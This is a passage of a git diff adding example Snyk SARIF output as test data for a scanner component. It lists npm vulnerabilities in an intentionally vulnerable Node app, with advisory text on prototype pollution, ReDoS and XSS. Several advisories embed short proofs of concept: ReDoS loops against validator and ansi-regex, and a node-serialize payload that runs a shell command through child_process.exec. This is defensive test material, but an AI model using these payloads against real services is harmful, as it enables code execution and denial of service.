to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n\u003cbr\u003e \n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack. \u003cbr\u003eDoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`). \u003cbr\u003e The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service. \u003cbr\u003e**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.\u003cbr\u003e**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.\u003cbr\u003e **For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `tough-cookie` to version 4.1.3 or higher.\n# References\n- [GitHub Commit](https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e)\n- [GitHub Issue](https://github.com/salesforce/tough-cookie/issues/282)\n- [GitHub Release](https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3)\n"},"properties":{"cvssv3_baseScore":6.5,"security-severity":"6.5","tags":["security","CWE-1321","npm"]}} + Message: This file introduces a vulnerable tough-cookie package with a medium severity vulnerability.Bunknown÷ + +package.json:1-1SNYK-JS-TYPEDFUNCTION-174139\This file introduces a vulnerable typed-function package with a high severity vulnerability. :Û MatchedRule: {"id":"SNYK-JS-TYPEDFUNCTION-174139","shortDescription":{"text":"High severity - Arbitrary Code Execution vulnerability in typed-function"},"fullDescription":{"text":"(CVE-2017-1001004) typed-function@0.10.5"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: typed-function\n* Introduced through: dvna@0.0.1, mathjs@3.10.1 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1 › typed-function@0.10.5\n# Overview\n[typed-function](https://github.com/josdejong/typed-function) is a library used for type checking of JavaScript functions.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution due to the creation of a typed function with JavaScript code in the `_name` variable.\n# Remediation\nUpgrade `typed-function` to version 0.10.6 or higher.\n# References\n- [GitHub Commit](https://github.com/josdejong/typed-function/commit/6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe)\n- [NPM Security Advisory](https://www.npmjs.com/advisories/819)\n"},"properties":{"cvssv3_baseScore":8.8,"security-severity":"8.8","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable typed-function package with a high severity vulnerability.Bunknown’. +package.json:1-1SNYK-JS-VALIDATOR-1090599YThis file introduces a vulnerable validator package with a medium severity vulnerability. :ü,MatchedRule: {"id":"SNYK-JS-VALIDATOR-1090599","shortDescription":{"text":"Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in validator"},"fullDescription":{"text":"validator@10.11.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: validator\n* Introduced through: dvna@0.0.1, sequelize@4.44.4 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4 › validator@10.11.0\n# Overview\n[validator](https://www.npmjs.com/package/validator) is a library of string validators and sanitizers.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isSlug` function\r\n\r\n## PoC\r\n```\r\nvar validator = require(\"validator\")\r\nfunction build_attack(n) {\r\n\tvar ret = \"111\"\r\n\tfor (var i = 0; i \u003c n; i++) {\r\n\t\tret += \"a\"\r\n\t}\r\n\r\n\treturn ret+\"_\";\r\n}\r\nfor(var i = 1; i \u003c= 50000; i++) {\r\n if (i % 10000 == 0) {\r\n var time = Date.now();\r\n var attack_str = build_attack(i)\r\n validator.isSlug(attack_str)\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n }\r\n}\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `validator` to version 13.6.0 or higher.\n# References\n- [GitHub Commit](https://github.com/tux-tn/validator.js/commit/b21879cf45c05ee11b2d79e612b651bf7b2d93b7#diff-f41087599986e29c3c0dc15b62f1bf96d8aba16fe41f3730e315c84c2c4cb311)\n- [GitHub Issue](https://github.com/validatorjs/validator.js/issues/1596)\n- [GitHubPR - Actual fix](https://github.com/validatorjs/validator.js/pull/1738)\n- [GitHub PR - Initial fix](https://github.com/validatorjs/validator.js/pull/1603)\n"},"properties":{"cvssv3_baseScore":5.3,"security-severity":"5.3","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable validator package with a medium severity vulnerability.Bunknownˆ, +package.json:1-1SNYK-JS-VALIDATOR-1090601YThis file introduces a vulnerable validator package with a medium severity vulnerability. :ò*MatchedRule: {"id":"SNYK-JS-VALIDATOR-1090601","shortDescription":{"text":"Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in validator"},"fullDescription":{"text":"validator@10.11.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: validator\n* Introduced through: dvna@0.0.1, sequelize@4.44.4 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4 › validator@10.11.0\n# Overview\n[validator](https://www.npmjs.com/package/validator) is a library of string validators and sanitizers.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isHSL` function.\r\n\r\n## PoC\r\n```\r\nvar validator = require(\"validator\")\r\nfunction build_attack(n) {\r\n\tvar ret = \"hsla(0\"\r\n\tfor (var i = 0; i \u003c n; i++) {\r\n\t\tret += \" \"\r\n\t}\r\n\r\n\treturn ret+\"â—Ž\";\r\n}\r\nfor(var i = 1; i \u003c= 50000; i++) {\r\n if (i % 1000 == 0) {\r\n var time = Date.now();\r\n var attack_str = build_attack(i)\r\n validator.isHSL(attack_str)\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n }\r\n}\r\n\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `validator` to version 13.6.0 or higher.\n# References\n- [GitHub Issue](https://github.com/validatorjs/validator.js/issues/1598)\n- [GitHub PR](https://github.com/validatorjs/validator.js/pull/1651)\n"},"properties":{"cvssv3_baseScore":5.3,"security-severity":"5.3","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable validator package with a medium severity vulnerability.Bunknown£, +package.json:1-1SNYK-JS-VALIDATOR-1090602YThis file introduces a vulnerable validator package with a medium severity vulnerability. :+MatchedRule: {"id":"SNYK-JS-VALIDATOR-1090602","shortDescription":{"text":"Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in validator"},"fullDescription":{"text":"validator@10.11.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: validator\n* Introduced through: dvna@0.0.1, sequelize@4.44.4 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4 › validator@10.11.0\n# Overview\n[validator](https://www.npmjs.com/package/validator) is a library of string validators and sanitizers.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isEmail` function.\r\n\r\n## PoC\r\n```\r\nvar validator = require(\"validator\")\r\nfunction build_attack(n) {\r\n\tvar ret = \"\"\r\n\tfor (var i = 0; i \u003c n; i++) {\r\n\t\tret += \"\u003c\"\r\n\t}\r\n\r\n\treturn ret+\"\";\r\n}\r\nfor(var i = 1; i \u003c= 50000; i++) {\r\n if (i % 10000 == 0) {\r\n var time = Date.now();\r\n var attack_str = build_attack(i)\r\n validator.isEmail(attack_str,{ allow_display_name: true })\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n }\r\n}\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `validator` to version 13.6.0 or higher.\n# References\n- [GitHub Issue](https://github.com/validatorjs/validator.js/issues/1597)\n- [GitHub PR](https://github.com/validatorjs/validator.js/pull/1651)\n"},"properties":{"cvssv3_baseScore":5.3,"security-severity":"5.3","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable validator package with a medium severity vulnerability.Bunknown† +package.json:1-1npm:node-serialize:20170208`This file introduces a vulnerable node-serialize package with a critical severity vulnerability. :ç MatchedRule: {"id":"npm:node-serialize:20170208","shortDescription":{"text":"Critical severity - Arbitrary Code Execution vulnerability in node-serialize"},"fullDescription":{"text":"(CVE-2017-5941) node-serialize@0.0.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: node-serialize\n* Introduced through: dvna@0.0.1 and node-serialize@0.0.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › node-serialize@0.0.4\n# Overview\r\n[`node-serialize`](https://www.npmjs.com/package/node-serialize) serializes an object and it's function into a JSON.\r\n\r\nAffected versions of this package are vulnerable to Arbitrary Code Execution when untrusted user-input is passed into the `unserialize()` function.\r\n\r\n**Example:**\r\n```js\r\nvar serialize = require('node-serialize');\r\nvar payload = '{\"rce\":\"_$$ND_FUNC$$_function (){require(\\'child_process\\').exec(\\'ls /\\', function(error, stdout, stderr) { console.log(stdout) });}()\"}';\r\nserialize.unserialize(payload);\r\n```\r\n\r\n# Remediation\r\nThere is no fix version for `node-serialize`\r\n\r\n# References\r\n- [Opsecx Blog](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)\r\n- [GitHub Issue](https://github.com/luin/serialize/issues/4)"},"properties":{"cvssv3_baseScore":9.8,"security-severity":"9.8","tags":["security","CWE-502","npm"]}} + Message: This file introduces a vulnerable node-serialize package with a critical severity vulnerability.Bunknown \ No newline at end of file diff --git a/components/producers/snyk-node/exampleData/snyk.out b/components/producers/snyk-node/exampleData/snyk.out new file mode 100644 index 000000000..748124c49 --- /dev/null +++ b/components/producers/snyk-node/exampleData/snyk.out @@ -0,0 +1,3099 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "semanticVersion": "1.1293.1", + "version": "1.1293.1", + "informationUri": "https://docs.snyk.io/", + "properties": { + "artifactsScanned": 321 + }, + "rules": [ + { + "id": "SNYK-JS-ANSIREGEX-1583908", + "shortDescription": { + "text": "High severity - Regular Expression Denial of Service (ReDoS) vulnerability in ansi-regex" + }, + "fullDescription": { + "text": "(CVE-2021-3807) ansi-regex@2.1.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: ansi-regex\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › npmlog@4.1.2 › gauge@2.7.4 › string-width@1.0.2 › strip-ansi@3.0.1 › ansi-regex@2.1.1\n# Overview\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the sub-patterns` [[\\\\]()#;?]*` and `(?:;[-a-zA-Z\\\\d\\\\/#&.:=?%@~_]*)*`.\r\n\r\n\r\n## PoC\r\n```js\r\nimport ansiRegex from 'ansi-regex';\r\n\r\nfor(var i = 1; i <= 50000; i++) {\r\n var time = Date.now();\r\n var attack_str = \"\\u001B[\"+\";\".repeat(i*10000);\r\n ansiRegex().test(attack_str)\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n}\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `ansi-regex` to version 3.0.1, 4.1.1, 5.0.1, 6.0.1 or higher.\n# References\n- [GitHub Commit](https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1)\n- [GitHub Commit](https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a)\n- [GitHub Commit](https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9)\n- [GitHub PR](https://github.com/chalk/ansi-regex/pull/37)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JS-BCRYPT-572911", + "shortDescription": { + "text": "High severity - Insecure Encryption vulnerability in bcrypt" + }, + "fullDescription": { + "text": "(CVE-2020-7689) bcrypt@1.0.3" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: bcrypt\n* Introduced through: dvna@0.0.1 and bcrypt@1.0.3\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3\n# Overview\n[bcrypt](https://www.npmjs.com/package/bcrypt) is an A library to help you hash passwords.\n\nAffected versions of this package are vulnerable to Insecure Encryption. Data is truncated wrong when its length is greater than 255 bytes.\n# Remediation\nUpgrade `bcrypt` to version 5.0.0 or higher.\n# References\n- [GitHub Issue](https://github.com/kelektiv/node.bcrypt.js/issues/776)\n- [GitHub PR 1](https://github.com/kelektiv/node.bcrypt.js/pull/806)\n- [GitHub PR 2](https://github.com/kelektiv/node.bcrypt.js/pull/807)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-326", + "npm" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JS-BCRYPT-575033", + "shortDescription": { + "text": "Medium severity - Cryptographic Issues vulnerability in bcrypt" + }, + "fullDescription": { + "text": "bcrypt@1.0.3" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: bcrypt\n* Introduced through: dvna@0.0.1 and bcrypt@1.0.3\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3\n# Overview\n[bcrypt](https://www.npmjs.com/package/bcrypt) is an A library to help you hash passwords.\n\nAffected versions of this package are vulnerable to Cryptographic Issues. When hashing a password containing an ASCII NUL character, that character acts as the string terminator. Any following characters are ignored.\n# Remediation\nUpgrade `bcrypt` to version 5.0.0 or higher.\n# References\n- [GitHub Issue](https://github.com/kelektiv/node.bcrypt.js/issues/774)\n- [GitHub PR](https://github.com/kelektiv/node.bcrypt.js/pull/807)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-310", + "npm" + ], + "cvssv3_baseScore": 5.9, + "security-severity": "5.9" + } + }, + { + "id": "SNYK-JS-COOKIE-8163060", + "shortDescription": { + "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in cookie" + }, + "fullDescription": { + "text": "(CVE-2024-47764) cookie@0.4.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: cookie\n* Introduced through: dvna@0.0.1, csurf@1.11.0 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › csurf@1.11.0 › cookie@0.4.0\n# Overview\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS) via the cookie `name`, `path`, or `domain`, which can be used to set unexpected values to other cookie fields.\n\n# Workaround\nUsers who are not able to upgrade to the fixed version should avoid passing untrusted or arbitrary values for the cookie fields and ensure they are set by the application instead of user input.\n# Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n## Types of attacks\nThere are a few methods by which XSS can be 